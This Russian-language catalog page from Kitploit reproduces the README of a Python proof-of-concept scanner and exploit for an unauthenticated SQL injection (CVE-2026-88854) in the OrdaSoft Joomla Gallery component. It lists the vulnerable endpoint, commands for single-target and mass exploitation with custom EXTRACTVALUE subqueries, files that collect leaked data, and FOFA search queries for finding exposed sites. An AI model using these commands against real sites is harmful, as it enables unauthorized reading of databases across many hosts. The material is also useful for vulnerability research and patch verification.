Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-88854 — Python 3 PoC-сканер и эксплойт для CVE-2026-88854 — неаутентифицированная SQL-инъекция в OrdaSoft Joomla Gallery, с режимами массовой проверки и чтения данных через EXTRACTVALUE. | Kitploit
Инструменты/GitHubGitHub/murrez/cve-2026-88854
РазведкаСканеры уязвимостейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubmurrez/cve-2026-88854

CVE-2026-88854

Python 3 PoC-сканер и эксплойт для CVE-2026-88854 — неаутентифицированная SQL-инъекция в OrdaSoft Joomla Gallery, с режимами массовой проверки и чтения данных через EXTRACTVALUE.

Репозиторий
31 день назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-88854 — SQL-инъекция в OrdaSoft Joomla Gallery

Python 3 PoC-сканер/эксплойт для CVE-2026-88854 в OrdaSoft OS Responsive Image Gallery для Joomla.

Компонентcom_osgallery, com_osgallery_light
Затронуто1.0.0 – 6.2.6
Исправлено в6.2.7+
CVSS 4.09.3 (Критический)
АутентификацияНе требуется (публичный mod_osgallery_search)
CWECWE-89

Краткое описание

showSearchResult() / showSearchResultAjax() читают textsearch / searchText через $input->getVar(), что не обеспечивает должного экранирования для SQL. Значение конкатенируется в условие LIKE. Неаутентифицированные посетители могут использовать инъекцию типа UNION для чтения содержимого базы данных.

Типичная поверхность запроса:

root@kitploit:~
GET /index.php?option=com_osgallery&task=showSearchResultAjax&format=raw&textsearch=...

В устаревших установках может использоваться имя задачи searhResult (опечатка).

Требования

  • Python 3.9+
  • pip install -r requirements.txt

Использование

root@kitploit:~
pip install -r requirements.txt

# Fingerprint + strict SQLi probe (error / time / EXTRACTVALUE)
python poc.py -u https://target.example --mode check

# Mass check
python poc.py --list targets.example.txt --mode check --threads 30 --quiet

# MySQL error-based read (default subquery: VERSION())
python poc.py -u https://target.example --mode exploit

python poc.py -u https://target.example --mode exploit \
  --subquery "SELECT DATABASE()"

# Mass exploit (writes leaks to exploited.txt, not hits.txt)
python poc.py --list targets.example.txt --mode exploit --threads 5 --quiet \
  --output exploit_results.jsonl --vuln-list exploited.txt

# Re-tier a prior mass check by manifest version (optional)
python audit_scan.py --jsonl cve_2026_88854_results.jsonl

Параметры CLI

Вывод (массовая проверка)

ФайлСодержимое
cve_2026_88854_results.jsonlJSON по каждой цели
hits.txtURL-кандидаты (exploitable_candidate)

Распространённые значения status (check)

Пост-сканирующий аудит (audit_scan.py)

После массовой проверки запустите audit_scan.py, чтобы повторно получить манифесты администратора и разделить цели:

Версия галереи читается из элемента <version> в administrator/components/com_osgallery/osgallery.xml, а не из атрибута Joomla extension version=.

Ограничения

  • Режим Exploit использует MySQL error-based EXTRACTVALUE; MariaDB/Postgres, отключённые ошибки или WAF могут дать отсутствие утечки, даже если CVE применима.
  • Только различия в длине при boolean-инъекции не считаются подтверждённой SQLi (ModSecurity 406 вызывал ложные срабатывания при тестировании).
  • Версия в манифесте ≤ 6.2.6 указывает на окно экспозиции, а не на гарантированную эксплуатируемость SQLi на каждом хосте.
  • Для установок Joomla в подкаталоге требуется правильный базовый URL (например, https://host/site).

FOFA / подсказки для обнаружения

root@kitploit:~
app="Joomla" && body="com_osgallery"
body="/images/com_osgallery/"

Структура репозитория

root@kitploit:~
.
├── poc.py
├── audit_scan.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

Локальные списки целей и артефакты запусков (list.txt, fofa*.csv, *.jsonl, hits*.txt, …) находятся в .gitignore и не должны коммититься.

Ссылки

  • NVD — CVE-2026-88854
  • OrdaSoft Joomla Gallery

Правовая информация

Только для авторизованного тестирования безопасности. Вы несёте ответственность за соблюдение применимых законов и правил программ.

Скачать инструмент
ПараметрОписание
-u, --urlБазовый URL одного целевого сайта (для установок в подкаталоге: укажите путь)
--listФайл со списком целей (по одному URL на строку)
--modecheck или exploit
--subquerySQL внутри EXTRACTVALUE (режим exploit, по умолчанию SELECT VERSION())
--threads, -jМассовая параллельность (по умолчанию 20)
--timeoutТаймаут HTTP в секундах (по умолчанию 20)
--proxyURL HTTP(S)-прокси
--outputРезультаты в JSONL (по умолчанию cve_2026_88854_results.jsonl)
--vuln-listДля check → hits.txt; для exploit → exploited.txt
--quiet, -qМеньше вывода о ходе выполнения
СтатусЗначение
sqli_confirmedSQLi на основе ошибок/времени или подтверждённая утечка через EXTRACTVALUE
likely_vulnerable_versionВерсия в манифесте ≤ 6.2.6 + endpoint поиска
likely_componentГалерея обнаружена, версия неизвестна
boolean_inconclusiveТолько разница в длине ответа (часто WAF); не считается подтверждённой
patched_versionВерсия в манифесте > 6.2.6
component_no_search_endpointКомпонент присутствует, задача поиска недоступна
no_componentcom_osgallery не обнаружен
ФайлСодержимое
hits_version_lte_626.txtВерсия галереи в манифесте ≤ 6.2.6
hits_component_endpoint.txtГалерея + endpoint, версия не читается
hits_patched.txtМанифест > 6.2.6
fofa_stale.txtКомпонент отсутствует (устаревшая запись FOFA)
cve_2026_88854_audit.jsonlОбогащённый JSONL